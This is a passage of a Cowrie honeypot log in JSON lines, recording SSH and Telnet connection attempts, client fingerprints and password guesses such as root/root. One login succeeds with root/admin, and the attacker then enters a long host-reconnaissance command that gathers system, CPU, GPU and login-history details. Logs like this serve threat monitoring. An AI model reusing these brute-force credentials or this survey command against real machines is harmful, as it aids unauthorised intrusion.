{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/205de8b70c21b31dd101f554c1abbded6867b7524137873037a223653dfd6595","size":1972,"shasum":"205de8b70c21b31dd101f554c1abbded6867b7524137873037a223653dfd6595","duplicate":false,"duration":"6.5","message":"Closing TTY Log: var/lib/cowrie/tty/205de8b70c21b31dd101f554c1abbded6867b7524137873037a223653dfd6595 after 6.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:04:00.573479Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.session.closed","duration":"8.8","message":"Connection lost after 8.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:04:00.574864Z","src_ip":"8.138.136.155","session":"8b5234323a9c"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":44322,"dst_ip":"1.2.3.4","dst_port":22,"session":"5c4103c2eef3","protocol":"ssh","message":"New connection: 139.19.117.131:44322 (1.2.3.4:22) [session: 5c4103c2eef3]","sensor":"my-vps","timestamp":"2025-09-08T19:04:58.275704Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:04:58.276912Z","src_ip":"139.19.117.131","session":"5c4103c2eef3"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-09-08T19:04:58.294724Z","src_ip":"139.19.117.131","session":"5c4103c2eef3"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"e4:bf:ff:25:f3:72:8d:ff:72:86:53:04:1b:24:14:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDqVFjLmGDb4Ys7S4c0Hx0Ll+UGv+b7a2AaxwPFZbxVKpZkGvvoOtIMmiBjBSKVSyppq/Q1rEvCGjgqSg0OMNcVnPt6UyIDvjNDO5m0k6zRlup+/axj0jJXXEFP7z8DjTRNrljp0YkREmpS/EQAv9RCxzfaH+YhQaIT3G3e0737HQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint e4:bf:ff:25:f3:72:8d:ff:72:86:53:04:1b:24:14:b0","sensor":"my-vps","timestamp":"2025-09-08T19:04:58.338368Z","src_ip":"139.19.117.131","session":"5c4103c2eef3"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"e4:bf:ff:25:f3:72:8d:ff:72:86:53:04:1b:24:14:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDqVFjLmGDb4Ys7S4c0Hx0Ll+UGv+b7a2AaxwPFZbxVKpZkGvvoOtIMmiBjBSKVSyppq/Q1rEvCGjgqSg0OMNcVnPt6UyIDvjNDO5m0k6zRlup+/axj0jJXXEFP7z8DjTRNrljp0YkREmpS/EQAv9RCxzfaH+YhQaIT3G3e0737HQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T19:04:58.338975Z","src_ip":"139.19.117.131","session":"5c4103c2eef3"}
{"eventid":"cowrie.client.fingerprint","username":"admin","fingerprint":"e4:bf:ff:25:f3:72:8d:ff:72:86:53:04:1b:24:14:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDqVFjLmGDb4Ys7S4c0Hx0Ll+UGv+b7a2AaxwPFZbxVKpZkGvvoOtIMmiBjBSKVSyppq/Q1rEvCGjgqSg0OMNcVnPt6UyIDvjNDO5m0k6zRlup+/axj0jJXXEFP7z8DjTRNrljp0YkREmpS/EQAv9RCxzfaH+YhQaIT3G3e0737HQ==","type":"ssh-rsa","message":"public key attempt for user admin of type ssh-rsa with fingerprint e4:bf:ff:25:f3:72:8d:ff:72:86:53:04:1b:24:14:b0","sensor":"my-vps","timestamp":"2025-09-08T19:04:58.357308Z","src_ip":"139.19.117.131","session":"5c4103c2eef3"}
{"eventid":"cowrie.login.failed","username":"admin","fingerprint":"e4:bf:ff:25:f3:72:8d:ff:72:86:53:04:1b:24:14:b0","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQDqVFjLmGDb4Ys7S4c0Hx0Ll+UGv+b7a2AaxwPFZbxVKpZkGvvoOtIMmiBjBSKVSyppq/Q1rEvCGjgqSg0OMNcVnPt6UyIDvjNDO5m0k6zRlup+/axj0jJXXEFP7z8DjTRNrljp0YkREmpS/EQAv9RCxzfaH+YhQaIT3G3e0737HQ==","type":"ssh-rsa","message":"public key login attempt for [admin] failed","sensor":"my-vps","timestamp":"2025-09-08T19:04:58.357935Z","src_ip":"139.19.117.131","session":"5c4103c2eef3"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:05:08.276002Z","src_ip":"139.19.117.131","session":"5c4103c2eef3"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":38416,"dst_ip":"1.2.3.4","dst_port":23,"session":"2b7c5b9a649d","protocol":"telnet","message":"New connection: 102.212.42.184:38416 (1.2.3.4:23) [session: 2b7c5b9a649d]","sensor":"my-vps","timestamp":"2025-09-08T19:05:35.740075Z"}
{"eventid":"cowrie.session.closed","duration":12.840861320495605,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:05:48.580862Z","src_ip":"102.212.42.184","session":"2b7c5b9a649d"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":35152,"dst_ip":"1.2.3.4","dst_port":23,"session":"ca579323d119","protocol":"telnet","message":"New connection: 102.212.42.184:35152 (1.2.3.4:23) [session: ca579323d119]","sensor":"my-vps","timestamp":"2025-09-08T19:05:49.729931Z"}
{"eventid":"cowrie.session.closed","duration":12.811157703399658,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:02.540977Z","src_ip":"102.212.42.184","session":"ca579323d119"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":35383,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d7988467c51","protocol":"telnet","message":"New connection: 102.212.42.184:35383 (1.2.3.4:23) [session: 5d7988467c51]","sensor":"my-vps","timestamp":"2025-09-08T19:06:02.682760Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53002,"dst_ip":"1.2.3.4","dst_port":22,"session":"31fa12c3a619","protocol":"ssh","message":"New connection: 212.227.235.229:53002 (1.2.3.4:22) [session: 31fa12c3a619]","sensor":"my-vps","timestamp":"2025-09-08T19:06:08.756560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:06:08.797488Z","src_ip":"212.227.235.229","session":"31fa12c3a619"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:06:09.049963Z","src_ip":"212.227.235.229","session":"31fa12c3a619"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49894,"dst_ip":"1.2.3.4","dst_port":22,"session":"36ed34cdaa6f","protocol":"ssh","message":"New connection: 212.227.125.160:49894 (1.2.3.4:22) [session: 36ed34cdaa6f]","sensor":"my-vps","timestamp":"2025-09-08T19:06:10.133972Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:06:10.138722Z","src_ip":"212.227.125.160","session":"36ed34cdaa6f"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-08T19:06:10.340699Z","src_ip":"212.227.235.229","session":"31fa12c3a619"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:06:10.542907Z","src_ip":"212.227.125.160","session":"36ed34cdaa6f"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:11.647390Z","src_ip":"212.227.235.229","session":"31fa12c3a619"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-09-08T19:06:12.024713Z","src_ip":"212.227.125.160","session":"36ed34cdaa6f"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:13.331876Z","src_ip":"212.227.125.160","session":"36ed34cdaa6f"}
{"eventid":"cowrie.session.closed","duration":12.865480184555054,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:15.548101Z","src_ip":"102.212.42.184","session":"5d7988467c51"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":35590,"dst_ip":"1.2.3.4","dst_port":23,"session":"2d283a74f30a","protocol":"telnet","message":"New connection: 102.212.42.184:35590 (1.2.3.4:23) [session: 2d283a74f30a]","sensor":"my-vps","timestamp":"2025-09-08T19:06:15.710729Z"}
{"eventid":"cowrie.session.closed","duration":12.908600330352783,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:28.619236Z","src_ip":"102.212.42.184","session":"2d283a74f30a"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":35798,"dst_ip":"1.2.3.4","dst_port":23,"session":"1ca0d7efa6e9","protocol":"telnet","message":"New connection: 102.212.42.184:35798 (1.2.3.4:23) [session: 1ca0d7efa6e9]","sensor":"my-vps","timestamp":"2025-09-08T19:06:28.765529Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:34.175300Z","src_ip":"212.227.125.160","session":"8c79cc881980"}
{"eventid":"cowrie.session.closed","duration":180.17820119857788,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:34.179849Z","src_ip":"212.227.125.160","session":"8c79cc881980"}
{"eventid":"cowrie.session.closed","duration":12.7140371799469,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:41.479501Z","src_ip":"102.212.42.184","session":"1ca0d7efa6e9"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":36018,"dst_ip":"1.2.3.4","dst_port":23,"session":"797286c05c55","protocol":"telnet","message":"New connection: 102.212.42.184:36018 (1.2.3.4:23) [session: 797286c05c55]","sensor":"my-vps","timestamp":"2025-09-08T19:06:41.618763Z"}
{"eventid":"cowrie.session.closed","duration":12.929210662841797,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:06:54.547879Z","src_ip":"102.212.42.184","session":"797286c05c55"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":36216,"dst_ip":"1.2.3.4","dst_port":23,"session":"0111e5c1b4e8","protocol":"telnet","message":"New connection: 102.212.42.184:36216 (1.2.3.4:23) [session: 0111e5c1b4e8]","sensor":"my-vps","timestamp":"2025-09-08T19:06:55.706085Z"}
{"eventid":"cowrie.session.closed","duration":13.702045679092407,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:07:09.408066Z","src_ip":"102.212.42.184","session":"0111e5c1b4e8"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":36438,"dst_ip":"1.2.3.4","dst_port":23,"session":"3b6c2d970e83","protocol":"telnet","message":"New connection: 102.212.42.184:36438 (1.2.3.4:23) [session: 3b6c2d970e83]","sensor":"my-vps","timestamp":"2025-09-08T19:07:09.547513Z"}
{"eventid":"cowrie.session.closed","duration":12.861529350280762,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:07:22.408963Z","src_ip":"102.212.42.184","session":"3b6c2d970e83"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":36456,"dst_ip":"1.2.3.4","dst_port":23,"session":"d80bf9e55e6e","protocol":"telnet","message":"New connection: 102.212.42.184:36456 (1.2.3.4:23) [session: d80bf9e55e6e]","sensor":"my-vps","timestamp":"2025-09-08T19:07:22.561267Z"}
{"eventid":"cowrie.session.closed","duration":12.907535076141357,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:07:35.468729Z","src_ip":"102.212.42.184","session":"d80bf9e55e6e"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":36745,"dst_ip":"1.2.3.4","dst_port":23,"session":"859b916c63e9","protocol":"telnet","message":"New connection: 102.212.42.184:36745 (1.2.3.4:23) [session: 859b916c63e9]","sensor":"my-vps","timestamp":"2025-09-08T19:07:35.606722Z"}
{"eventid":"cowrie.session.closed","duration":12.803611040115356,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:07:48.410248Z","src_ip":"102.212.42.184","session":"859b916c63e9"}
{"eventid":"cowrie.session.connect","src_ip":"102.212.42.184","src_port":36920,"dst_ip":"1.2.3.4","dst_port":23,"session":"d27359d408b5","protocol":"telnet","message":"New connection: 102.212.42.184:36920 (1.2.3.4:23) [session: d27359d408b5]","sensor":"my-vps","timestamp":"2025-09-08T19:07:49.573607Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34358,"dst_ip":"1.2.3.4","dst_port":22,"session":"08feb454aa5e","protocol":"ssh","message":"New connection: 212.227.235.229:34358 (1.2.3.4:22) [session: 08feb454aa5e]","sensor":"my-vps","timestamp":"2025-09-08T19:07:58.869583Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:07:58.870432Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:07:59.151927Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:08:00.637820Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46528,"dst_ip":"1.2.3.4","dst_port":22,"session":"360b295fe09b","protocol":"ssh","message":"New connection: 212.227.125.160:46528 (1.2.3.4:22) [session: 360b295fe09b]","sensor":"my-vps","timestamp":"2025-09-08T19:08:00.696474Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:08:00.710988Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:08:01.091986Z","src_ip":"212.227.125.160","session":"360b295fe09b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:08:01.207529Z","src_ip":"212.227.235.229","session":"08feb454aa5e"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo 